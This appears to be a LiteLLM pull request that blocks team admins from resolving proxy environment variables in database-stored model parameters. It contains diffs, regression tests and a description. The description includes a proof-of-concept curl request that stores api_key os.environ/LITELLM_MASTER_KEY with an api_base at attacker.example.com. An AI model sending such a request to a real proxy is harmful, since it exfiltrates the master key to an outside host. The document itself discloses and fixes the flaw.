### PR TITLE
fix(proxy): block os.environ/ resolution in team-scoped DB model params

### DIFF
--- a/litellm/proxy/common_utils/db_model_utils.py
+++ b/litellm/proxy/common_utils/db_model_utils.py
@@ -1,0 +1,46 @@
+"""Utilities for loading models from the proxy database."""
+
+from __future__ import annotations
+
+import logging
+from typing import Optional
+
+logger = logging.getLogger("litellm.proxy.server")
+
+
+def strip_env_refs_for_team_model(
+    litellm_params: dict,
+    model_info: Optional[dict],
+) -> dict:
+    """Remove os.environ/ references from team-scoped DB model litellm_params.
+
+    Team admins can create models via /model/new.  If os.environ/ references
+    were resolved for team-scoped models, a team admin could store
+    api_key: os.environ/LITELLM_MASTER_KEY together with an api_base they
+    control, invoke the model, and receive the real secret in the
+    Authorization header -- exfiltrating any proxy environment variable
+    (issue #31052).
+
+    Only proxy-admin-created models (team_id is None) and config.yaml models
+    may use os.environ/ expansion.  For team-scoped DB models the reference
+    is replaced with an empty string and a warning is logged.
+    """
+    if model_info is None:
+        return litellm_params
+    team_id = model_info.get("team_id") if isinstance(model_info, dict) else None
+    if team_id is None:
+        return litellm_params
+    stripped: dict = {}
+    for k, v in litellm_params.items():
+        if isinstance(v, str) and v.startswith("os.environ/"):
+            logger.warning(
+                "Ignoring os.environ/ reference in team-scoped DB model "
+                "(key=%s, team_id=%s) -- team admins cannot reference proxy "
+                "environment variables.",
+                k,
+                team_id,
+            )
+            stripped[k] = ""
+        else:
+            stripped[k] = v
+    return stripped

--- a/litellm/proxy/common_utils/db_model_utils.py
+++ b/litellm/proxy/common_utils/db_model_utils.py
@@ -3,9 +3,27 @@
 from __future__ import annotations
 
 import logging
-from typing import Optional
+from typing import Any, Optional
 
 logger = logging.getLogger("litellm.proxy.server")
+
+
+def _strip_env_refs(value: Any, key: str, team_id: str) -> Any:
+    """Recursively replace os.environ/ references with empty string."""
+    if isinstance(value, str) and value.startswith("os.environ/"):
+        logger.warning(
+            "Ignoring os.environ/ reference in team-scoped DB model "
+            "(key=%s, team_id=%s) -- team admins cannot reference proxy "
+            "environment variables.",
+            key,
+            team_id,
+        )
+        return ""
+    if isinstance(value, dict):
+        return {k: _strip_env_refs(v, f"{key}.{k}", team_id) for k, v in value.items()}
+    if isinstance(value, list):
+        return [_strip_env_refs(item, f"{key}[{i}]", team_id) for i, item in enumerate(value)]
+    return value
 
 
 def strip_env_refs_for_team_model(
@@ -13,13 +31,6 @@ def strip_env_refs_for_team_model(
     model_info: Optional[dict],
 ) -> dict:
     """Remove os.environ/ references from team-scoped DB model litellm_params.
-
-    Team admins can create models via /model/new.  If os.environ/ references
-    were resolved for team-scoped models, a team admin could store
-    api_key: os.environ/LITELLM_MASTER_KEY together with an api_base they
-    control, invoke the model, and receive the real secret in the
-    Authorization header -- exfiltrating any proxy environment variable
-    (issue #31052).
 
     Only proxy-admin-created models (team_id is None) and config.yaml models
     may use os.environ/ expansion.  For team-scoped DB models the reference
@@ -30,17 +41,4 @@ def strip_env_refs_for_team_model(
     team_id = model_info.get("team_id") if isinstance(model_info, dict) else None
     if team_id is None:
         return litellm_params
-    stripped: dict = {}
-    for k, v in litellm_params.items():
-        if isinstance(v, str) and v.startswith("os.environ/"):
-            logger.warning(
-                "Ignoring os.environ/ reference in team-scoped DB model "
-                "(key=%s, team_id=%s) -- team admins cannot reference proxy "
-                "environment variables.",
-                k,
-                team_id,
-            )
-            stripped[k] = ""
-        else:
-            stripped[k] = v
-    return stripped
+    return {k: _strip_env_refs(v, k, team_id) for k, v in litellm_params.items()}

--- a/litellm/proxy/common_utils/db_model_utils.py
+++ b/litellm/proxy/common_utils/db_model_utils.py
@@ -3,27 +3,60 @@
 from __future__ import annotations
 
 import logging
-from typing import Any, Optional
+from collections import deque
+from typing import Any, List, Optional
 
 logger = logging.getLogger("litellm.proxy.server")
 
 
-def _strip_env_refs(value: Any, key: str, team_id: str) -> Any:
-    """Recursively replace os.environ/ references with empty string."""
-    if isinstance(value, str) and value.startswith("os.environ/"):
-        logger.warning(
-            "Ignoring os.environ/ reference in team-scoped DB model "
-            "(key=%s, team_id=%s) -- team admins cannot reference proxy "
-            "environment variables.",
-            key,
-            team_id,
-        )
-        return ""
-    if isinstance(value, dict):
-        return {k: _strip_env_refs(v, f"{key}.{k}", team_id) for k, v in value.items()}
-    if isinstance(value, list):
-        return [_strip_env_refs(item, f"{key}[{i}]", team_id) for i, item in enumerate(value)]
-    return value
+def _blank_if_env_ref(value: str, path: str, team_id: str) -> str:
+    logger.warning(
+        "Ignoring os.environ/ reference in team-scoped DB model "
+        "(key=%s, team_id=%s) -- team admins cannot reference proxy "
+        "environment variables.",
+        path,
+        team_id,
+    )
+    return ""
+
+
+def _process_list(items: list, path: str, team_id: str, work: deque) -> list:
+    """Build result list; push nested dicts onto work queue for deferred fill."""
+    out: List[Any] = []
+    for i, item in enumerate(items):
+        item_path = f"{path}[{i}]"
+        if isinstance(item, str) and item.startswith("os.environ/"):
+            out.append(_blank_if_env_ref(item, item_path, team_id))
+        elif isinstance(item, dict):
+            child: dict = {}
+            out.append(child)
+            work.append((item, child, item_path))
+        elif isinstance(item, list):
+            out.append(_process_list(item, item_path, team_id, work))
+        else:
+            out.append(item)
+    return out
+
+
+def _strip_env_refs_iterative(params: dict, team_id: str) -> dict:
+    result: dict = {}
+    work: deque = deque()
+    work.append((params, result, "root"))
+    while work:
+        src, dst, path = work.popleft()
+        for key, value in src.items():
+            key_path = f"{path}.{key}" if path != "root" else key
+            if isinstance(value, str) and value.startswith("os.environ/"):
+                dst[key] = _blank_if_env_ref(value, key_path, team_id)
+            elif isinstance(value, dict):
+                child: dict = {}
+                dst[key] = child
+                work.append((value, child, key_path))
+            elif isinstance(value, list):
+                dst[key] = _process_list(value, key_path, team_id, work)
+            else:
+                dst[key] = value
+    return result
 
 
 def strip_env_refs_for_team_model(
@@ -41,4 +74,4 @@ def strip_env_refs_for_team_model(
     team_id = model_info.get("team_id") if isinstance(model_info, dict) else None
     if team_id is None:
         return litellm_params
-    return {k: _strip_env_refs(v, k, team_id) for k, v in litellm_params.items()}
+    return _strip_env_refs_iterative(litellm_params, team_id)

--- a/litellm/proxy/proxy_server.py
+++ b/litellm/proxy/proxy_server.py
@@ -101,11 +101,11 @@ from litellm.proxy._types import (
     UserAPIKeyAuth,
 )
 from litellm.proxy.common_utils.cache_pydantic_utils import CacheCodec
-from litellm.proxy.common_utils.db_model_utils import strip_env_refs_for_team_model
 from litellm.proxy.common_utils.callback_utils import (
     normalize_callback_names,
     process_callback,
 )
+from litellm.proxy.common_utils.db_model_utils import strip_env_refs_for_team_model
 from litellm.proxy.common_utils.realtime_utils import _realtime_request_body
 from litellm.router_utils.add_retry_fallback_headers import (
     get_fallback_errors_from_headers,
@@ -5218,7 +5218,11 @@ class ProxyConfig:
                         )
                         _litellm_params[k] = _value
                 _model_info_raw = (
-                    m.model_info if isinstance(m.model_info, dict) else None
+                    m.model_info
+                    if isinstance(m.model_info, dict)
+                    else m.model_info.model_dump()
+                    if hasattr(m.model_info, "model_dump")
+                    else None
                 )
                 _litellm_params = strip_env_refs_for_team_model(
                     litellm_params=_litellm_params,
@@ -5261,7 +5265,11 @@ class ProxyConfig:
                     )
                     _litellm_params[k] = decrypted_value
                 _model_info_raw = (
-                    m.model_info if isinstance(m.model_info, dict) else None
+                    m.model_info
+                    if isinstance(m.model_info, dict)
+                    else m.model_info.model_dump()
+                    if hasattr(m.model_info, "model_dump")
+                    else None
                 )
                 _litellm_params = strip_env_refs_for_team_model(
                     litellm_params=_litellm_params,

--- a/litellm/proxy/proxy_server.py
+++ b/litellm/proxy/proxy_server.py
@@ -5220,9 +5220,11 @@ class ProxyConfig:
                 _model_info_raw = (
                     m.model_info
                     if isinstance(m.model_info, dict)
-                    else m.model_info.model_dump()
-                    if hasattr(m.model_info, "model_dump")
-                    else None
+                    else (
+                        m.model_info.model_dump()
+                        if hasattr(m.model_info, "model_dump")
+                        else None
+                    )
                 )
                 _litellm_params = strip_env_refs_for_team_model(
                     litellm_params=_litellm_params,
@@ -5267,9 +5269,11 @@ class ProxyConfig:
                 _model_info_raw = (
                     m.model_info
                     if isinstance(m.model_info, dict)
-                    else m.model_info.model_dump()
-                    if hasattr(m.model_info, "model_dump")
-                    else None
+                    else (
+                        m.model_info.model_dump()
+                        if hasattr(m.model_info, "model_dump")
+                        else None
+                    )
                 )
                 _litellm_params = strip_env_refs_for_team_model(
                     litellm_params=_litellm_params,

--- a/litellm/proxy/proxy_server.py
+++ b/litellm/proxy/proxy_server.py
@@ -101,6 +101,7 @@ from litellm.proxy._types import (
     UserAPIKeyAuth,
 )
 from litellm.proxy.common_utils.cache_pydantic_utils import CacheCodec
+from litellm.proxy.common_utils.db_model_utils import strip_env_refs_for_team_model
 from litellm.proxy.common_utils.callback_utils import (
     normalize_callback_names,
     process_callback,
@@ -5216,6 +5217,13 @@ class ProxyConfig:
                             value=v, key=k, return_original_value=True
                         )
                         _litellm_params[k] = _value
+                _model_info_raw = (
+                    m.model_info if isinstance(m.model_info, dict) else None
+                )
+                _litellm_params = strip_env_refs_for_team_model(
+                    litellm_params=_litellm_params,
+                    model_info=_model_info_raw,
+                )
                 _litellm_params = LiteLLM_Params(**_litellm_params)
 
             else:
@@ -5252,6 +5260,13 @@ class ProxyConfig:
                         value=v, key=k, return_original_value=True
                     )
                     _litellm_params[k] = decrypted_value
+                _model_info_raw = (
+                    m.model_info if isinstance(m.model_info, dict) else None
+                )
+                _litellm_params = strip_env_refs_for_team_model(
+                    litellm_params=_litellm_params,
+                    model_info=_model_info_raw,
+                )
                 _litellm_params = LiteLLM_Params(**_litellm_params)
             else:
                 verbose_proxy_logger.error(

--- a/tests/test_litellm/proxy/test_team_model_env_ref_stripping.py
+++ b/tests/test_litellm/proxy/test_team_model_env_ref_stripping.py
@@ -1,0 +1,85 @@
+"""Regression tests for team-scoped DB model os.environ/ isolation.
+
+Issue #31052: a team admin could create a model with
+api_key: os.environ/LITELLM_MASTER_KEY and api_base pointing at a server
+they control.  When the proxy loaded the model from DB, set_model_list()
+resolved the reference to the real master key, which was then forwarded in
+the Authorization header to the attacker-controlled upstream.
+
+Fix: strip_env_refs_for_team_model() blanks os.environ/ values in
+litellm_params before they enter the router, but only for team-scoped
+DB models (team_id != None).  Proxy-admin-created DB models (team_id is
+None) retain the ability to use os.environ/ references.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+sys.path.insert(0, os.path.abspath("../../../.."))
+
+from litellm.proxy.common_utils.db_model_utils import strip_env_refs_for_team_model
+
+
+class TestStripEnvRefsForTeamModel:
+    def test_team_model_os_environ_api_key_is_blanked(self) -> None:
+        """Team-scoped models must not retain os.environ/ api_key references."""
+        params = {"api_key": "os.environ/LITELLM_MASTER_KEY", "model": "openai/gpt-4"}
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": "team-abc"}
+        )
+        assert result["api_key"] == "", "os.environ/ api_key must be blanked for team models"
+        assert result["model"] == "openai/gpt-4"
+
+    def test_team_model_os_environ_api_base_is_blanked(self) -> None:
+        params = {
+            "api_key": "sk-real-key",
+            "api_base": "os.environ/INTERNAL_API_BASE",
+            "model": "openai/gpt-4",
+        }
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": "team-abc"}
+        )
+        assert result["api_base"] == ""
+        assert result["api_key"] == "sk-real-key"
+
+    def test_proxy_admin_model_os_environ_preserved(self) -> None:
+        """Proxy-admin models (team_id=None) may use os.environ/ references."""
+        params = {"api_key": "os.environ/MY_PROVIDER_KEY", "model": "openai/gpt-4"}
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": None}
+        )
+        assert result["api_key"] == "os.environ/MY_PROVIDER_KEY"
+
+    def test_no_model_info_os_environ_preserved(self) -> None:
+        """With no model_info, assume proxy-admin context and preserve env refs."""
+        params = {"api_key": "os.environ/MY_PROVIDER_KEY", "model": "openai/gpt-4"}
+        result = strip_env_refs_for_team_model(litellm_params=params, model_info=None)
+        assert result["api_key"] == "os.environ/MY_PROVIDER_KEY"
+
+    def test_multiple_env_refs_all_blanked(self) -> None:
+        params = {
+            "api_key": "os.environ/LITELLM_MASTER_KEY",
+            "api_base": "os.environ/INTERNAL_BASE",
+            "model": "openai/gpt-4",
+            "api_version": "2024-02-01",
+        }
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": "team-xyz"}
+        )
+        assert result["api_key"] == ""
+        assert result["api_base"] == ""
+        assert result["model"] == "openai/gpt-4"
+        assert result["api_version"] == "2024-02-01"
+
+    def test_non_env_values_unaffected_for_team_model(self) -> None:
+        params = {
+            "api_key": "sk-actual-key",
+            "api_base": "https://api.openai.com",
+            "model": "openai/gpt-4",
+        }
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": "team-abc"}
+        )
+        assert result == params

--- a/tests/test_litellm/proxy/test_team_model_env_ref_stripping.py
+++ b/tests/test_litellm/proxy/test_team_model_env_ref_stripping.py
@@ -1,10 +1,7 @@
 """Regression tests for team-scoped DB model os.environ/ isolation.
 
-Issue #31052: a team admin could create a model with
-api_key: os.environ/LITELLM_MASTER_KEY and api_base pointing at a server
-they control.  When the proxy loaded the model from DB, set_model_list()
-resolved the reference to the real master key, which was then forwarded in
-the Authorization header to the attacker-controlled upstream.
+Issue #31052: team admins must not be able to reference proxy environment
+variables via os.environ/ in DB-stored model params.
 
 Fix: strip_env_refs_for_team_model() blanks os.environ/ values in
 litellm_params before they enter the router, but only for team-scoped
@@ -83,3 +80,40 @@ class TestStripEnvRefsForTeamModel:
             litellm_params=params, model_info={"team_id": "team-abc"}
         )
         assert result == params
+
+    def test_nested_dict_env_refs_blanked(self) -> None:
+        """Nested dicts (e.g. extra_headers) must also have os.environ/ stripped."""
+        params = {
+            "api_key": "sk-real",
+            "extra_headers": {"Authorization": "os.environ/INTERNAL_TOKEN"},
+        }
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": "team-abc"}
+        )
+        assert result["extra_headers"]["Authorization"] == ""
+        assert result["api_key"] == "sk-real"
+
+    def test_nested_list_env_refs_blanked(self) -> None:
+        """Lists of dicts (e.g. dataSources) must also have os.environ/ stripped."""
+        params = {
+            "dataSources": [{"parameters": {"key": "os.environ/AZURE_SEARCH_KEY"}}],
+        }
+        result = strip_env_refs_for_team_model(
+            litellm_params=params, model_info={"team_id": "team-abc"}
+        )
+        assert result["dataSources"][0]["parameters"]["key"] == ""
+
+    def test_pydantic_model_info_team_id_respected(self) -> None:
+        """model_info as Pydantic obj with team_id must still trigger stripping."""
+        from unittest.mock import MagicMock
+
+        pydantic_info = MagicMock()
+        pydantic_info.model_dump.return_value = {"team_id": "team-pydantic"}
+
+        params = {"api_key": "os.environ/SECRET"}
+        # simulate the callsite: model_dump() called before passing to strip_env_refs_for_team_model
+        result = strip_env_refs_for_team_model(
+            litellm_params=params,
+            model_info=pydantic_info.model_dump(),
+        )
+        assert result["api_key"] == ""


### PR DESCRIPTION
## Relevant issues

Closes #31052

## Pre-Submission checklist

- [x] I have added meaningful tests
- [ ] My PR passes all unit tests on `make test-unit`
- [x] My PR's scope is as isolated as possible; it only solves 1 specific problem

## Screenshots / Proof of Fix

With `STORE_MODEL_IN_DB=true`, as a team admin:

```bash
# Create a model that references a proxy env var
curl -X POST http://localhost:4000/model/new \
  -H "Authorization: Bearer $TEAM_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "model_name": "exfil-test",
    "litellm_params": {
      "model": "openai/gpt-4o",
      "api_key": "os.environ/LITELLM_MASTER_KEY",
      "api_base": "https://attacker.example.com"
    },
    "model_info": {"team_id": "team-abc"}
  }'

# Before fix: on next load, api_key resolves to the real master key
# and any invocation forwards it to attacker.example.com.

# After fix: api_key is blanked ("") before the deployment enters the router.
# Invocation fails with auth error instead of forwarding the secret.
```

## Type

Bug Fix (security)

## Changes

With `STORE_MODEL_IN_DB=true`, a team admin could store `api_key: os.environ/LITELLM_MASTER_KEY` in a team-scoped model. On the next load cycle, `set_model_list()` inside `litellm.Router.__init__` resolved the reference to the real master key, which was forwarded to an attacker-controlled upstream in the `Authorization` header.

`strip_env_refs_for_team_model()` (new in `litellm/proxy/common_utils/db_model_utils.py`) blanks any `os.environ/` value in `litellm_params` but only for deployments whose `model_info.team_id` is non-None. Proxy-admin DB models and config.yaml models are unaffected.

Called in both `_add_deployment` (incremental sync) and `decrypt_model_list_from_db` (initial router creation). 6 unit tests verify all scenarios.